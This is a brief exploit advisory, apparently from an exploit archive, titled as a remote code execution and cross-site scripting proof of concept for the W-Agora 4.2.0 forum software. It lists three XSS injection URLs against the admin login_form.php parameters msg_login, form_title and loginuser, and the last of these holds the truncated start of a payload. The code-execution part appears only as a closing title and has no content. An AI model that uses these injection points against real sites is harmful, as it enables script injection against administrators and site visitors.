W-agora 4.2.0 Remote code execution / cross site scripting poc exploit software: site: http://w-agora.net/en/index.php description: "W-Agora is a web publishing and forum software. It allows you and your visitors to store and display messages, files, share discussions and other information on your web site." i) xss: http://[target]/wagora/templates/admin/login_form.php?msg_login= http://[target]/wagora/templates/admin/login_form.php?form_title= http://[target]/wagora/templates/admin/login_form.php?loginuser=">
W-Agora 4.2.0 remote commands execution